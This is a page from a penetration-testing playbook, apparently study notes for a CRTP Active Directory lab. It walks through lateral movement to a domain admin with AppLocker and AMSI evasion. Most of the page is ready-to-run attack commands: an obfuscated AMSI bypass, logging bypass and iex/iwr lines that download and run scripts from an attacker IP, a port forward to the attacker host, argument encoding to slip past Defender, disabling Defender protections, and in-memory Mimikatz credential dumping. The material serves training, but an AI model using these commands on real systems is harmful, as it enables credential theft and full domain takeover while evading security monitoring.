PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  • Lab 7 Scenario:
  • AMSI Bypass
  • NetLoader
  • Port Forward Localhost:80 to Attacker Machine
  • Running SafetyKatz.bat
  • Use Loader without Encoding
  • Use Loader after Encoding (Safety.bat)
  • Download & Execute SafetyKatz.exe in-memory
  • PowerShell Remoting
  • Disable AMSI using Set-MpPreference
  1. Active Directory Pentest

Evasion

Lab 7 Scenario:

  • Attack Path 1:

    • Student -> dcorp-ci via Jenkins

    • dcorp-ci is local admin on -> dcorp-mgmt

    • Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and use them to access dcorp-dc from Student.

  • Attack Path 2 (Derivative Local Admin or shortest path to DA):

    • Student has local admin privilges on dcorp-adminsrv.

    • To extract credentials, we evaded AppLocker.

    • dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt.

    • We extracted domain admin credentials from dcorp-mgmt and used to access dcorp-dc from Student.

  • Student machine (student372) has exploited Jenkins to get a reverse shell on "dcorp\ciadmin"

  • From dcorp\ciadmin, we disable SB Logging to run AMSI bypass script. This is done to avoid PowerView detection.

  • We transfer PowerView to ciadmin to check domain sessions using Find-DomainUserLocationand find that there is a domain admin session on dcorp-mgmt server.

  • We can abuse this using WinRS or PSRemoting.

  • Abuse using WinRS

    • We first check if we can execute commands on dcorp-mgmt and if WinRM port is open.

    • Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt.

    • We want SafetyKatz.exe to run on memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin on ciadmin) to copy Loader to dcorp-mgmt.

    • We also want to avoid detection on dcorp-mgmt by calling remote IP to download SafeteKatz. So instead of directly calling attacker IP, we port forward localhost to attacker IP.

    • Since Defender would detect SafetyKatz even with NetLoader, we encode arguments using ArgSplit.bat, copy the output to Safety.bat which runs SafetyKatz.exe through loader with the encoded Arguments.

    • We download the Safety.bat on ciadmin and xcopy it to dcorp-mgmt.

    • Finally, we use WinRS to run Safety.bat which uses Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt.

    • We get credentials of svcadmin - a domain administrator.

  • Abuse using PSRemoting

    • Check if we can execute commands on dcorp-mgmt using PSRemoting

    • Download InvokeMimi.ps1 on dcorp-mgmt to dump hashes.

    • Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt.

    • After disabling, we run Invoke-command to call the Invoke-Mimi on the session objected we created while disabling AMSI.

    • We finally get the hashes.

  • Using Over-Pass-The-Hash

    • We can use O-PTH to use svcadmin's credentials.

    • From an elevated shell, we can use Rubeus, SafetyKatz, Invoke-Mimi to get a process from hash we obtained earlier as domain controller.

  • Derivative Local Admin

    • We are trying to find the machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess

    • We find student372 has local admin access to dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372.

    • When we try to turn of script logging or bypass AMSI, it does not work because PSRemoting uses Constrained Language Mode (CLM).

    • We can check this using $ExecutionContext.SessionState.LanguageMode

    • This is either because of AppLocker of WDAC (Windows Defender Application Control). Both of these are application allow listing solutions from Microsoft. We can check AppLocker Policy using: Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections cc

    • We find that everyone can run scripts from Program Files directory.

    • We can disable Defender and run any script in ProgramFiles.

    • We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1 which adds "Invoke-Mimi -Command sekurlsa::ekeys" at the end of the Invoke-Mimi.ps1 file.

    • From student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's ProgramFiles.

AMSI Bypass

First disable Enhanced Script Block Logging so that AMSI is not logged.

 iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing)

Then run the below command to bypass AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

NetLoader

Download and xcopy.

iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Port Forward Localhost:80 to Attacker Machine

$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"

Running SafetyKatz.bat

Use Loader without Encoding

iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Use Loader after Encoding (Safety.bat)

Encode SafetyKatz arguments using Argsplit.bat

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

Include Argsplit output in Safety.bat

@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args
%Pwn% exit"

Download & Execute SafetyKatz.exe in-memory

iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat

echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat

$null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat"

PowerShell Remoting

Check if we can run cmds on dcorp-mgmt using PSRemoting

Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt

Use Invoke-Mimi to dump hashes of domain admin svcadmin:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Disable AMSI using Set-MpPreference

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Run Invoke-Mimi and get hashes

Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

PreviousDCSyncNextEvasion Cheetsheet

Last updated 11 months ago